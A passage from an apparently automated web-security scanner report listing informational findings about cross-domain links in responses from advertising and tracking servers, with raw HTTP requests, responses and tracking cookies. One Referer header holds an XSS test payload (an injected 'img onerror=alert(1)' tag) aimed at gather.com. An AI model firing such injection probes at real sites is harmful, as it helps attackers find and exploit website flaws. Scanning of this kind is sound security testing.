Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9tYXAubWVkaWE2ZGVncmVlcy5jb20vb3Jic2Vydi9oYnBpeD9waXhJZD02MjQ5JnBjdj00NyZwdGlkPTEwMiZ0cHY9MDAmdHB1PTAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2QudHVybi5jb20vci9kZC9pZC9MMk56YVdRdk1TOWphV1F2TXpjeE5qa3pNUzkwTHpJL2RwdWlkLzAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0wMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2NtLmcuZG91YmxlY2xpY2submV0L3BpeGVsP25pZD1leGVsYXRlJmo9MCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDA3MzgmbXRfZGNpZD0zODImdjE9JnYyPSZ2Mz0mczE9JnMyPSZzMyIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=270f3051e489add843c2c665150bbcc2
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://loadm.exelator.com/load/?p=204&g=001&bi=CAESEBdZ--lBk9ZCAZ1YUP6sHFk&cver=1&j=0
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:54:39 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 298
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://loadm.exelator.com/load/?p=204&amp;g=001&amp;bi=CAESEBdZ--lBk9ZCAZ1YUP6sHFk&amp;cver=1&amp;j=0">here</A>
...[SNIP]...
18.81. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=simplifi HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://um.simpli.fi/g_match?id=CAESEHr_ur10_2e_p_OmdBQ571k&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:42:15 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 266
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://um.simpli.fi/g_match?id=CAESEHr_ur10_2e_p_OmdBQ571k&amp;cver=1">here</A>
...[SNIP]...
18.82. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=bluekai& HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=92044374
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://tags.bluekai.com/site/2981?id=CAESEKtAMmLM9y1QYdDvsceIXbs&cver=1&
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:35:40 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 277
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tags.bluekai.com/site/2981?id=CAESEKtAMmLM9y1QYdDvsceIXbs&amp;cver=1&amp;">here</A>
...[SNIP]...
18.83. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=simplifi HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://um.simpli.fi/g_match?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:24:54 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 230
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://um.simpli.fi/g_match?id=E1">here</A>
...[SNIP]...
18.84. http://cm.npc-hearst.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js_1_0/?config=2130893885&type=home_page&ctxtId=home_page&keywordCharEnc=utf8&source=npc_hearst_stamfordadvocate_t2_ctxt&adwd=171&adht=630&ctxtUrl=http%3A%2F%2Fwww.stamfordadvocate.com%2F&css_url=http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.css&refUrl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php&du=1&cb=1316294655906&ctxtContent=%3Chead%3E%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.google-analytics.com%2Fga.js%22%3E%3C%2Fscript%3E%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A18%3A09%20on%20prodWCM3%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22sa%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20%3C HTTP/1.1
Host: cm.npc-hearst.overture.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMnF0tnc1cAC6ZN1ww=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjCycjNzcAJwJN0Aw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Tue, 14-Sep-2021 16:23:04 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</title>

<link rel="stylesheet" href="http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...
18.85. http://cm.npc-hearst.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js_1_0/?config=2130893885&type=home_page&ctxtId=home_page&keywordCharEnc=utf8&source=npc_hearst_seattlepi_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.seattlepi.com%2F&css_url=http://extras.seattlepi.com/css/ysm.css&refUrl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php&du=1&cb=1316294686485&ctxtContent=%3Chead%3E%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.google-analytics.com%2Fga.js%22%3E%3C%2Fscript%3E%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A19%3A28%20on%20prodWCM5%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22spi%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20 HTTP/1.1
Host: cm.npc-hearst.overture.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjCycjRzcAM%2bxMvww=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjC2NjVzMAM41MpQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Tue, 14-Sep-2021 16:23:34 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4516


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</title>

<link rel="stylesheet" href="http://extras.seattlepi.com/css/ysm.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...
18.86. http://cn2.kaboodle.com/ht/scripts/wick.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cn2.kaboodle.com
Path:   /ht/scripts/wick.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ht/scripts/wick.js?v=r54745-2 HTTP/1.1
Host: cn2.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"11799-1315340776000"
Last-Modified: Tue, 06 Sep 2011 20:26:16 GMT
Content-Type: text/javascript
Content-Length: 11799
Cache-Control: max-age=15500
Expires: Sat, 17 Sep 2011 20:49:04 GMT
Date: Sat, 17 Sep 2011 16:30:44 GMT
Connection: close
Vary: Accept-Encoding

var collection=new Array();var isCommaDelimiter=true;function freezeEvent(b){if(b.preventDefault){b.preventDefault()}b.returnValue=false;b.cancelBubble=true;if(b.stopPropagation){b.stopPropagation()}r
...[SNIP]...
<p class="siwCredit">Powered By: <a target="PhrawgBlog" href="http://chrisholland.blogspot.com/?from=smartinput&ref='+escape(location.href)+'">Chris Holland</a>
...[SNIP]...
18.87. http://contextweb.pixel.invitemedia.com/context_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb.pixel.invitemedia.com
Path:   /context_sync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /context_sync?call_type=iframe HTTP/1.1
Host: contextweb.pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch
Cookie: segments_p1="eJzjYuFo+MjIxcLR3McEJDs7mIFk73EQu+8+iD1xOwuQnAQkOTmmBwj8utv2BSQw8wdIydw/ICUL74AMWPQHJHLsNYi9rBEkvhEoy8yxNg9IrM8D8deDdG4Cq9gBJneCrd4NZu8Dk/vB5Gmw6UfB7GPfQezT70HsM2DyAljkEljNLbDzboPJuUAXcHLcjxZ4/uPNZxagrc9zgaL3J4LkPnwA6fwCJr8DSWaOfxwA98xIvg=="; exchange_uid=eyIyIjogWyIyMjMwNjE2MjU1NTY5NzE1ODc3IiwgNzM0Mzg3XSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXSwgIjc5IjogWyIwMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSIsIHRydWVdfQ=="; conversions="{\"70914\": 1315307386+ \"61326\": 1315307639}"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:05:03 GMT
Pragma: no-cache
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 151
Connection: close
Server: Jetty(7.3.1.v20110307)

<html><body><img width="0" height="0" src="http://bh.contextweb.com/bh/rtset?do=add&pid=538569&ev=cee046d8-41c5-4e6a-bed7-eafff2c70056"/></body></html>
18.88. http://dis.criteo.com/dis/optoutstatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /dis/optoutstatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /dis/optoutstatus.aspx?s=nai&o=1&c=1&nocache=0.8244701 HTTP/1.1
Host: dis.criteo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ASP.NET_SessionId=qti4vu3zwv10qfmajtyvgpmt; optout=1

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sat, 17 Sep 2011 17:17:27 GMT
Location: http://www.networkadvertising.org/optout/opt_success.gif
Expires: -1
Pragma: no-cache
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>
18.89. http://dis.criteo.com/dis/optoutstatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /dis/optoutstatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /dis/optoutstatus.aspx?s=nai&nocache=0.3313804 HTTP/1.1
Host: dis.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sat, 17 Sep 2011 16:43:36 GMT
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Expires: -1
Pragma: no-cache
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.90. http://edge.aperture.displaymarketplace.com/anotnai.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /anotnai.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /anotnai.gif?nocache=0.6108435&confirmNoTrack=true HTTP/1.1
Host: edge.aperture.displaymarketplace.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: NoTrack="Aperture Opt-Out"

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Server: D2D.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Type: text/html; charset=utf-8
Content-Length: 173
Expires: Sat, 17 Sep 2011 17:15:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:15:09 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>
18.91. http://edge.aperture.displaymarketplace.com/anotnaistat.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /anotnaistat.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /anotnaistat.gif?nocache=0.2352484 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NoTrack="Aperture Opt-Out"

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Server: D2D.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Type: text/html; charset=utf-8
Content-Length: 175
Expires: Sat, 17 Sep 2011 16:43:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:43:35 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.92. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=3094658;type=non-c499;cat=unive790;u1=[bread%20crumb];ord=1;num=6572872332762.927? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.manilla.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 17 Sep 2011 16:35:58 GMT
Expires: Sat, 17 Sep 2011 16:35:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 789
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/972352506/?label=sfmdCK74xwIQ-tfTzwM&amp;guid=ON&amp;script=0"/><img src="https://search.spotxchange.com/track/tag/6523.1306/img" height="1" width="1" border="0"/><img src="https://bstats.adbrite.com/adserver/behavioral-data/0?d=48536689;bapid=13316;uid=680833" border="0" hspace="0" vspace="0" width="1" height="1"/><img src="https://secure.adnxs.com/seg?add=166056&t=2" width="1" height="1" />
<img src="https://ad.yieldmanager.com/pixel?id=1420070&t=2" width="1" height="1" /></body>
...[SNIP]...
18.93. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9503572870358044&format=300x250_as&output=html&h=250&w=300&lmt=1316312817&channel=5741996231&ad_type=text&ea=0&color_bg=B0DBF7&color_border=B0DBF7&color_link=000000&color_text=000000&color_url=000000&flash=10.3.183&url=http%3A%2F%2Fwww.misquincemag.com%2F&dt=1316294811965&bpp=800&shv=r20110907&jsv=r20110914&correlator=1316294817100&frm=4&adk=613819279&ga_vid=46403009.1316294817&ga_sid=1316294817&ga_hid=718859782&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=9&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=5140 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

